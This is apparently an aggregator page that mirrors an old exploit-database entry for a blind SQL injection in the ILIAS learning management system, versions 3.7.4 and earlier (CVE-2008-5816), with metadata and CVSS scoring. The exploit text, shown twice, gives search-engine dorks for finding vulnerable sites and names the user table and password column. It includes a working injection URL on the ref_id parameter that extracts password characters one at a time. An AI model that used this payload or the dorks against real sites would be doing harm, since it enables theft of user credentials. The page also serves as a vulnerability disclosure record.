Search...

ILIAS <= 3.7.4 ref_id Blind SQL Injection Vulnerability

2008-12-24T00:00:00

ID EDB-ID:7570
Type exploitdb
Reporter Lidloses_Auge
Modified 2008-12-24T00:00:00

Description

ILIAS <= 3.7.4 (ref_id) Blind SQL Injection Vulnerability. CVE-2008-5816. Webapps exploit for php platform

                                        
                                            ###############################################################
#
#      ILIAS Learning Management &lt;= 3.7.4 - SQL Injection Vulnerability     
#                                                             
#      Vulnerability discovered by: Lidloses_Auge             
#      Greetz to:                   -=Player=- , Suicide, g4ms3, enco,
#                                   Palme, GPM, karamble, Free-Hack
#      Date:                        24.12.2008
#
###############################################################
#                                                             
#      Developer: http://www.ilias.de
#      Dork 1: "powered by ILIAS"
#      Dork 2: inurl:repository.php ilias
#      Description: The GET Parameter "ref_id" in "repository.php"
#		    contains a Blind SQL Injection Vulnerability
#
#      Usertable:         usr_data
#      Important columns: usr_id, login, passwd
#
#      Example:
#      http://www.site.com/repository.php?cmd=frameset&ref_id=1+and+ascii(substring((select+passwd+from+usr_data+limit+0,1),1,1))&gt;50--
#                                                             
###############################################################

# milw0rm.com [2008-12-24]

JSON Vulners Source

Initial Source

{"id": "EDB-ID:7570", "hash": "8f2e7856d1c8be8cc6f516e352025be5", "type": "exploitdb", "bulletinFamily": "exploit", "title": "ILIAS <= 3.7.4 ref_id Blind SQL Injection Vulnerability", "description": "ILIAS <= 3.7.4 (ref_id) Blind SQL Injection Vulnerability. CVE-2008-5816. Webapps exploit for php platform", "published": "2008-12-24T00:00:00", "modified": "2008-12-24T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/7570/", "reporter": "Lidloses_Auge", "references": [], "cvelist": ["CVE-2008-5816"], "lastseen": "2016-02-01T03:30:55", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 7.4, "vector": "NONE", "modified": "2016-02-01T03:30:55"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-5816"]}], "modified": "2016-02-01T03:30:55"}, "vulnersScore": 7.4}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/7570/", "sourceData": "###############################################################\n#\n# ILIAS Learning Management <= 3.7.4 - SQL Injection Vulnerability \n# \n# Vulnerability discovered by: Lidloses_Auge \n# Greetz to: -=Player=- , Suicide, g4ms3, enco,\n# Palme, GPM, karamble, Free-Hack\n# Date: 24.12.2008\n#\n###############################################################\n# \n# Developer: http://www.ilias.de\n# Dork 1: \"powered by ILIAS\"\n# Dork 2: inurl:repository.php ilias\n# Description: The GET Parameter \"ref_id\" in \"repository.php\"\n#\t\t contains a Blind SQL Injection Vulnerability\n#\n# Usertable: usr_data\n# Important columns: usr_id, login, passwd\n#\n# Example:\n# http://www.site.com/repository.php?cmd=frameset&ref_id=1+and+ascii(substring((select+passwd+from+usr_data+limit+0,1),1,1))>50--\n# \n###############################################################\n\n# milw0rm.com [2008-12-24]\n", "osvdbidlist": ["51138"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}

{"cve": [{"lastseen": "2019-05-29T18:09:29", "bulletinFamily": "NVD", "description": "SQL injection vulnerability in repository.php in ILIAS 3.7.4 and earlier allows remote attackers to execute arbitrary SQL commands via the ref_id parameter.", "modified": "2017-09-29T01:32:00", "id": "CVE-2008-5816", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5816", "published": "2009-01-02T18:11:00", "title": "CVE-2008-5816", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}

ILIAS &lt;= 3.7.4 ref_id Blind SQL Injection Vulnerability

Description

ILIAS <= 3.7.4 (ref_id) Blind SQL Injection Vulnerability. CVE-2008-5816. Webapps exploit for php platform

ILIAS <= 3.7.4 ref_id Blind SQL Injection Vulnerability